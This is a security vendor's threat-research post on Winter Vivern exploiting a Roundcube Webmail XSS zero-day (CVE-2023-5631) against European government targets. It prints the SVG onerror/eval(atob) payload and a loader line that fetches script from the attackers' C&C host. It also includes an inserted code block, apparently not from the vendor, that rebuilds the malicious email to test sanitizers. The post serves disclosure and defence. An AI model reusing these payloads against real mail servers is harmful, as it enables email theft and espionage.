Sunday, November 19, 2023

Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers


ESET Research

ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible


ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group started exploiting a zero-day XSS vulnerability in the Roundcube Webmail server on October 11th, 2023. This is a different vulnerability than CVE-2020-35730, which was also exploited by the group according to our research.

According to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to governmental entities and a think tank, all in Europe.

Vulnerability disclosure timeline:

  • 2023-10-12: ESET Research reported the vulnerability to the Roundcube team.
  • 2023-10-14: The Roundcube team responded and acknowledged the vulnerability.
  • 2023-10-14: The Roundcube team patched the vulnerability.
  • 2023-10-16: The Roundcube team released security updates to address the vulnerability (1.6.4, 1.5.5, and 1.4.15).
  • 2023-10-18: ESET CNA issues a CVE for the vulnerability (CVE-2023-5631).
  • 2023-10-25: ESET Research blogpost published.

We would like to thank the Roundcube developers for their prompt reply and for patching the vulnerability in such a short time frame.

Winter Vivern profile

Winter Vivern is a cyberespionage group first revealed by DomainTools in 2021. It is believed to have been active since at least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group uses malicious documents, phishing websites, and a custom PowerShell backdoor (see the articles from the State Cyber Protection Centre of Ukraine and from SentinelLabs). We believe with low confidence that Winter Vivern is linked to MoustachedBouncer, a sophisticated Belarus-aligned group that we first published about in August, 2023.

Winter Vivern has been targeting Zimbra and Roundcube email servers belonging to governmental entities since at least 2022 – see this article from Proofpoint. In particular, we observed that the group exploited CVE-2020-35730, another XSS vulnerability in Roundcube, in August and September 2023. Note that Sednit (also known as APT28) is exploiting this old XSS vulnerability in Roundcube as well, sometimes against the same targets.

Technical details

Exploitation of the XSS vulnerability, assigned CVE-2023-5631, can be done remotely by sending a specially crafted email message. In this Winter Vivern campaign, the emails were sent from team.managment@outlook[.]com and had the subject Get started in your Outlook, as shown in Figure 1.

Figure 1. Malicious email message

At first sight, the email doesn't seem malicious – but if we examine the HTML source code, shown in Figure 2, we can see an SVG tag at the end, which contains a base64-encoded payload.

Figure 2. Email message with a malicious SVG tag

Once we decode the base64-encoded value in the href attribute of the use tag, we have:

<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

Since the x value of the href attribute is not a valid URL, the image fails to load and this element's onerror attribute is triggered. Decoding the payload in the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged), which is executed in the victim's browser in the context of their Roundcube session:

var fe=document.createElement('script');fe.src="https://recsecas[.]com/controlserver/checkupdate.js";document.body.appendChild(fe);

Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this was a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which did not properly sanitize the malicious SVG document before it was added to the HTML page rendered for the Roundcube user. We reported it to Roundcube and it was patched on October 14th, 2023 (see this commit). The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.

In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user's browser window. No manual interaction other than viewing the message in a web browser is required.
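The delivery chain decoded above (base64 value in the use tag's href, then an SVG whose onerror runs eval(atob(...)), then the script loader) and the sanitization gap in rcube_washtml.php can both be illustrated with a small analysis helper. The following is an added example and is not code from ESET or the Roundcube project: it peels the nested base64 layers out of a constructed email body to recover each stage and the loader URL, and flags the attributes (on* event handlers, data: URIs in href) that a mail-body sanitizer must strip. The assumption that the use tag's href is a data:image/svg+xml;base64 URI, the sample email body, and the function names are mine; the loader string is the one shown on the page, kept defanged so nothing resolves.

```javascript
// Added example (not ESET's or Roundcube's code): peel the nested delivery chain of the
// email described above and flag the SVG constructs a mail-body sanitizer must neutralise.
// Assumptions not stated on the page: the outer <use> href is a data:image/svg+xml;base64
// URI, and the email body below is a constructed sample. The loader string is the one
// decoded on the page, with its URL kept defanged so nothing here resolves.

const b64decode = (s) => Buffer.from(s, "base64").toString("utf8");
const b64encode = (s) => Buffer.from(s, "utf8").toString("base64");

// Second stage as decoded on the page (defanged URL).
const STAGE2_LOADER =
  "var fe=document.createElement('script');" +
  'fe.src="https://recsecas[.]com/controlserver/checkupdate.js";' +
  "document.body.appendChild(fe);";

// First stage as shown on the page: href="x" is not a valid URL, so onerror fires and
// evaluates the base64-encoded loader.
const STAGE1_SVG =
  '<svg id="x" xmlns="http://www.w3.org/2000/svg"> ' +
  `<image href="x" onerror="eval(atob('${b64encode(STAGE2_LOADER)}'))" /></svg>`;

// Constructed sample email body (assumed form): benign text, then the outer SVG whose
// <use> href carries the base64-encoded first stage.
const SAMPLE_EMAIL_HTML =
  "<html><body><p>Get started in your Outlook</p>" +
  '<svg xmlns="http://www.w3.org/2000/svg">' +
  `<use href="data:image/svg+xml;base64,${b64encode(STAGE1_SVG)}" /></svg>` +
  "</body></html>";

const TAG_RE = /<([A-Za-z][\w:-]*)([^>]*)>/g;
const ATTR_RE = /([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Flatten a markup fragment into {tag, name, value} attribute records (no DOM needed).
function attributes(markup) {
  const out = [];
  for (const tag of markup.matchAll(TAG_RE)) {
    for (const a of tag[2].matchAll(ATTR_RE)) {
      out.push({ tag: tag[1].toLowerCase(), name: a[1].toLowerCase(), value: a[2] ?? a[3] ?? a[4] });
    }
  }
  return out;
}

// Sanitizer-style checks: event-handler attributes and data: URIs in href/xlink:href are
// exactly what let the chain above execute and must not survive washing of a mail body.
function findings(markup) {
  const hits = [];
  for (const { tag, name, value } of attributes(markup)) {
    if (name.startsWith("on")) hits.push(`event handler ${name} on <${tag}>`);
    if ((name === "href" || name === "xlink:href") && /^\s*data:/i.test(value)) {
      hits.push(`data: URI in ${name} of <${tag}>`);
    }
  }
  return hits;
}

// Recursively decode: base64 SVG data: URIs yield embedded markup, on* handlers yield the
// eval(atob(...)) bodies, and URLs found in decoded JavaScript are collected as indicators.
function peelLayers(markup, depth = 0, acc = { stages: [], findings: [], urls: [] }) {
  if (depth > 8) return acc; // guard against pathological nesting
  acc.stages.push(markup);
  acc.findings.push(...findings(markup));
  for (const { name, value } of attributes(markup)) {
    const svg = value.match(/^data:image\/svg\+xml;base64,([A-Za-z0-9+/=]+)$/i);
    if (svg) peelLayers(b64decode(svg[1]), depth + 1, acc);
    if (name.startsWith("on")) {
      for (const m of value.matchAll(/atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g)) {
        const js = b64decode(m[1]);
        acc.stages.push(js);
        acc.urls.push(...(js.match(/https?:\/\/[^\s"'`;]+/g) ?? []));
      }
    }
  }
  return acc;
}

// Analyse the constructed sample and return the recovered stages, findings and URLs.
function analyseSample() {
  return peelLayers(SAMPLE_EMAIL_HTML);
}

console.log(JSON.stringify(analyseSample(), null, 2));
```

Run it with node: the output lists the three recovered stages (email body, inner SVG, loader), the two findings, and the defanged loader URL. A production washer should be allowlist-based rather than a blocklist like this one; the block only makes explicit which constructs the Winter Vivern chain depended on, so a sanitizer rule or mail-gateway detection can be checked against them.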

The second stage is a simple JavaScript loader named checkupdate.js and is shown in Figure 3.

Figure 3. JavaScript loader

The final JavaScript payload – shown in Figure 4 – is able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests to https://recsecas[.]com/controlserver/saveMessage.

Figure 4. Final JavaScript payload exfiltrating email messages from the Roundcube account (part of the obfuscated script removed for readability)

Conclusion

Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. Previously, it was using known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online.

Despite the low sophistication of the group's toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

Files

SHA-1 | Filename | Detection | Description
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 | checkupdate.js | JS/WinterVivern.B | JavaScript loader.
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 | N/A | JS/Kryptik.BIK | JavaScript payload exfiltrating emails in Roundcube.

Network

IP | Domain | Hosting provider | First seen | Details
38.180.76[.]31 | recsecas[.]com | M247 Europe SRL | 2023-09-28 | Winter Vivern C&C server

Email addresses

team.managment@outlook[.]com

MITRE ATT&CK techniques

This table was built using version 13 of the MITRE ATT&CK framework.

Tactic | ID | Name | Description
Resource Development | T1583.001 | Acquire Infrastructure: Domains | Winter Vivern operators bought a domain at Registrar.eu.
Resource Development | T1583.004 | Acquire Infrastructure: Server | Winter Vivern operators rented a server at M247.
Resource Development | T1587.004 | Develop Capabilities: Exploits | Winter Vivern operators probably developed an exploit for Roundcube.
Initial Access | T1190 | Exploit Public-Facing Application | Winter Vivern sent an email exploiting CVE-2023-5631 in Roundcube.
Initial Access | T1566 | Phishing | The vulnerability is triggered via a phishing email, which has to be opened in the Roundcube webmail by the victim.
Execution | T1203 | Exploitation for Client Execution | The JavaScript payload is executed via an XSS vulnerability in Roundcube.
Discovery | T1087.003 | Account Discovery: Email Account | The JavaScript payload can list folders in the email account.
Collection | T1114.002 | Email Collection: Remote Email Collection | The JavaScript payload can exfiltrate emails from the Roundcube account.
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | C&C communications use HTTPS.
Exfiltration | T1041 | Exfiltration Over C2 Channel | Exfiltration is done via HTTPS and to the same C&C server.
